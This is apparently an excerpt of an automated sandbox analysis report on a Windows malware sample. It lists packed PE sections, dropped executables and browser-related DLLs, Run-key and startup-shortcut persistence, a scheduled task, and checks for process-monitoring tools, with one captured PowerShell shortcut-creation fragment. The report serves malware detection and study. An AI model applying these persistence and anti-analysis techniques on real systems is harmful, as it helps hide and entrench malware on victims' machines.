                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 10.2.skotes.exe.2f0000.0.unpack :EW;.rsrc:W;.idata :W;abdubcdx:EW;ajsqmvlu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;abdubcdx:EW;ajsqmvlu:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeUnpacked PE file: 23.2.c61fcc859d.exe.5d0000.0.unpack :EW;.rsrc:W;.idata :W;htwuwyzf:EW;dhfttsvz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;htwuwyzf:EW;dhfttsvz:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeUnpacked PE file: 24.2.309de20225.exe.620000.0.unpack :EW;.rsrc :W;.idata :W; :EW;gcuyxxju:EW;busnlrvl:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;gcuyxxju:EW;busnlrvl:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeUnpacked PE file: 29.2.c2bb02869b.exe.790000.0.unpack :EW;.rsrc:W;.idata :W;lvwzwdeg:EW;pkeeaqxp:EW;.taggant:EW; vs :ER;.rsrc:W;
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeUnpacked PE file: 30.2.c61fcc859d.exe.5d0000.0.unpack :EW;.rsrc:W;.idata :W;htwuwyzf:EW;dhfttsvz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;htwuwyzf:EW;dhfttsvz:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeUnpacked PE file: 31.2.309de20225.exe.620000.0.unpack :EW;.rsrc :W;.idata :W; :EW;gcuyxxju:EW;busnlrvl:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;gcuyxxju:EW;busnlrvl:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeUnpacked PE file: 32.2.c2bb02869b.exe.790000.0.unpack :EW;.rsrc:W;.idata :W;lvwzwdeg:EW;pkeeaqxp:EW;.taggant:EW; vs :ER;.rsrc:W;
                    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                    Source: crypted[1].exe.11.drStatic PE information: real checksum: 0x0 should be: 0x30a52e
                    Source: c2bb02869b.exe.11.drStatic PE information: real checksum: 0x2b2208 should be: 0x2bb955
                    Source: c61fcc859d.exe.11.drStatic PE information: real checksum: 0x2ff672 should be: 0x305906
                    Source: random[1].exe0.11.drStatic PE information: real checksum: 0x2ff672 should be: 0x305906
                    Source: crypted.exe.11.drStatic PE information: real checksum: 0x0 should be: 0x30a52e
                    Source: random[1].exe.0.drStatic PE information: real checksum: 0x2b2208 should be: 0x2bb955
                    Source: random[1].exe.11.drStatic PE information: real checksum: 0x1badf5 should be: 0x1c5899
                    Source: DocumentsDGHCBAAEHC.exe.0.drStatic PE information: real checksum: 0x312fdf should be: 0x316665
                    Source: 309de20225.exe.11.drStatic PE information: real checksum: 0x1badf5 should be: 0x1c5899
                    Source: file.exeStatic PE information: real checksum: 0x1badf5 should be: 0x1c5899
                    Source: skotes.exe.9.drStatic PE information: real checksum: 0x312fdf should be: 0x316665
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: .rsrc
                    Source: file.exeStatic PE information: section name: .idata
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: gcuyxxju
                    Source: file.exeStatic PE information: section name: busnlrvl
                    Source: file.exeStatic PE information: section name: .taggant
                    Source: freebl3.dll.0.drStatic PE information: section name: .00cfg
                    Source: freebl3[1].dll.0.drStatic PE information: section name: .00cfg
                    Source: mozglue.dll.0.drStatic PE information: section name: .00cfg
                    Source: mozglue[1].dll.0.drStatic PE information: section name: .00cfg
                    Source: msvcp140.dll.0.drStatic PE information: section name: .didat
                    Source: msvcp140[1].dll.0.drStatic PE information: section name: .didat
                    Source: nss3.dll.0.drStatic PE information: section name: .00cfg
                    Source: nss3[1].dll.0.drStatic PE information: section name: .00cfg
                    Source: softokn3.dll.0.drStatic PE information: section name: .00cfg
                    Source: softokn3[1].dll.0.drStatic PE information: section name: .00cfg
                    Source: DocumentsDGHCBAAEHC.exe.0.drStatic PE information: section name:
                    Source: DocumentsDGHCBAAEHC.exe.0.drStatic PE information: section name: .idata
                    Source: DocumentsDGHCBAAEHC.exe.0.drStatic PE information: section name: abdubcdx
                    Source: DocumentsDGHCBAAEHC.exe.0.drStatic PE information: section name: ajsqmvlu
                    Source: DocumentsDGHCBAAEHC.exe.0.drStatic PE information: section name: .taggant
                    Source: random[1].exe.0.drStatic PE information: section name:
                    Source: random[1].exe.0.drStatic PE information: section name: .idata
                    Source: random[1].exe.0.drStatic PE information: section name: lvwzwdeg
                    Source: random[1].exe.0.drStatic PE information: section name: pkeeaqxp
                    Source: random[1].exe.0.drStatic PE information: section name: .taggant
                    Source: skotes.exe.9.drStatic PE information: section name:
                    Source: skotes.exe.9.drStatic PE information: section name: .idata
                    Source: skotes.exe.9.drStatic PE information: section name: abdubcdx
                    Source: skotes.exe.9.drStatic PE information: section name: ajsqmvlu
                    Source: skotes.exe.9.drStatic PE information: section name: .taggant
                    Source: random[1].exe.11.drStatic PE information: section name:
                    Source: random[1].exe.11.drStatic PE information: section name: .rsrc
                    Source: random[1].exe.11.drStatic PE information: section name: .idata
                    Source: random[1].exe.11.drStatic PE information: section name:
                    Source: random[1].exe.11.drStatic PE information: section name: gcuyxxju
                    Source: random[1].exe.11.drStatic PE information: section name: busnlrvl
                    Source: random[1].exe.11.drStatic PE information: section name: .taggant
                    Source: 309de20225.exe.11.drStatic PE information: section name:
                    Source: 309de20225.exe.11.drStatic PE information: section name: .rsrc
                    Source: 309de20225.exe.11.drStatic PE information: section name: .idata
                    Source: 309de20225.exe.11.drStatic PE information: section name:
                    Source: 309de20225.exe.11.drStatic PE information: section name: gcuyxxju
                    Source: 309de20225.exe.11.drStatic PE information: section name: busnlrvl
                    Source: 309de20225.exe.11.drStatic PE information: section name: .taggant
                    Source: pidgeon[1].exe.11.drStatic PE information: section name: .didata
                    Source: pidgeon.exe.11.drStatic PE information: section name: .didata
                    Source: c2bb02869b.exe.11.drStatic PE information: section name:
                    Source: c2bb02869b.exe.11.drStatic PE information: section name: .idata
                    Source: c2bb02869b.exe.11.drStatic PE information: section name: lvwzwdeg
                    Source: c2bb02869b.exe.11.drStatic PE information: section name: pkeeaqxp
                    Source: c2bb02869b.exe.11.drStatic PE information: section name: .taggant
                    Source: crypted[1].exe.11.drStatic PE information: section name: .00cfg
                    Source: crypted[1].exe.11.drStatic PE information: section name: .TON
                    Source: crypted.exe.11.drStatic PE information: section name: .00cfg
                    Source: crypted.exe.11.drStatic PE information: section name: .TON
                    Source: random[1].exe0.11.drStatic PE information: section name:
                    Source: random[1].exe0.11.drStatic PE information: section name: .idata
                    Source: random[1].exe0.11.drStatic PE information: section name: htwuwyzf
                    Source: random[1].exe0.11.drStatic PE information: section name: dhfttsvz
                    Source: random[1].exe0.11.drStatic PE information: section name: .taggant
                    Source: c61fcc859d.exe.11.drStatic PE information: section name:
                    Source: c61fcc859d.exe.11.drStatic PE information: section name: .idata
                    Source: c61fcc859d.exe.11.drStatic PE information: section name: htwuwyzf
                    Source: c61fcc859d.exe.11.drStatic PE information: section name: dhfttsvz
                    Source: c61fcc859d.exe.11.drStatic PE information: section name: .taggant
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeCode function: 9_2_0025D91C push ecx; ret 9_2_0025D92F
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeCode function: 9_2_00251359 push es; ret 9_2_0025135A
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_2_0030D91C push ecx; ret 10_2_0030D92F
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeCode function: 12_2_00414645 push esp; retf 0005h12_2_00414649
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeCode function: 12_2_0043B40E push ebx; retf 0025h12_2_0043B41A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD9B9327F5 push esp; iretd 13_2_00007FFD9B93282A
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeCode function: 15_2_0081F870 push eax; ret 15_2_00821C1E
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeCode function: 15_2_00843C9A push 89240285h; retf 15_2_00843CA0
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeCode function: 15_2_0083A99F push edx; ret 15_2_0083A9A1
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeCode function: 15_2_0083A9A7 push edx; ret 15_2_0083A9A9
                    Source: file.exeStatic PE information: section name: gcuyxxju entropy: 7.953797112174641
                    Source: DocumentsDGHCBAAEHC.exe.0.drStatic PE information: section name: entropy: 7.032225002026326
                    Source: random[1].exe.0.drStatic PE information: section name: entropy: 7.7855367165282425
                    Source: skotes.exe.9.drStatic PE information: section name: entropy: 7.032225002026326
                    Source: random[1].exe.11.drStatic PE information: section name: gcuyxxju entropy: 7.953797112174641
                    Source: 309de20225.exe.11.drStatic PE information: section name: gcuyxxju entropy: 7.953797112174641
                    Source: c2bb02869b.exe.11.drStatic PE information: section name: entropy: 7.7855367165282425
                    Source: random[1].exe0.11.drStatic PE information: section name: entropy: 7.071199300502182
                    Source: c61fcc859d.exe.11.drStatic PE information: section name: entropy: 7.071199300502182

                    Persistence and Installation Behavior

                    barindex
                    Drops PE files to the document folder of the user
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\DocumentsDGHCBAAEHC.exeJump to dropped file
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeJump to dropped file
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dllJump to dropped file
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\pidgeon[1].exeJump to dropped file
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dllJump to dropped file
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dllJump to dropped file
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\DocumentsDGHCBAAEHC.exeJump to dropped file
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJump to dropped file
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\crypted[1].exeJump to dropped file
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dllJump to dropped file
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dllJump to dropped file
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeJump to dropped file
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exeJump to dropped file
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\DocumentsDGHCBAAEHC.exeJump to dropped file

                    Boot Survival

                    barindex
                    Creates multiple autostart registry keys
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 309de20225.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c2bb02869b.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c61fcc859d.exeJump to behavior
                    Drops PE files to the user root directory
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\DocumentsDGHCBAAEHC.exeJump to dropped file
                    Powershell creates an autostart link
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exe'; $s.Save()@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this module via navigations and search. Tags = @('powershell','unit testing','bdd','tdd','mocking') # The web address of an icon which can
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exe'; $s.Save()@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this module via navigations and search. Tags = @('powershell','unit testing','bdd','tdd','mocking') # The web address of an icon which can
                    Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeWindow searched: window name: RegmonclassJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeWindow searched: window name: FilemonclassJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeWindow searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeWindow searched: window name: RegmonClass
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeWindow searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeWindow searched: window name: Regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeWindow searched: window name: Filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeWindow searched: window name: Regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeWindow searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeWindow searched: window name: RegmonClass
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeWindow searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeWindow searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeWindow searched: window name: RegmonClass
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeWindow searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeWindow searched: window name: Regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeWindow searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeWindow searched: window name: RegmonClass
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeWindow searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeWindow searched: window name: Regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeWindow searched: window name: Filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeWindow searched: window name: Regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeWindow searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeWindow searched: window name: RegmonClass
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeWindow searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeWindow searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeWindow searched: window name: RegmonClass
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeWindow searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeWindow searched: window name: Regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeWindow searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeWindow searched: window name: RegmonClass
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeWindow searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tyds.lnkJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tyds.lnkJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fvgp.lnk
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c61fcc859d.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c61fcc859d.exeJump to behavior
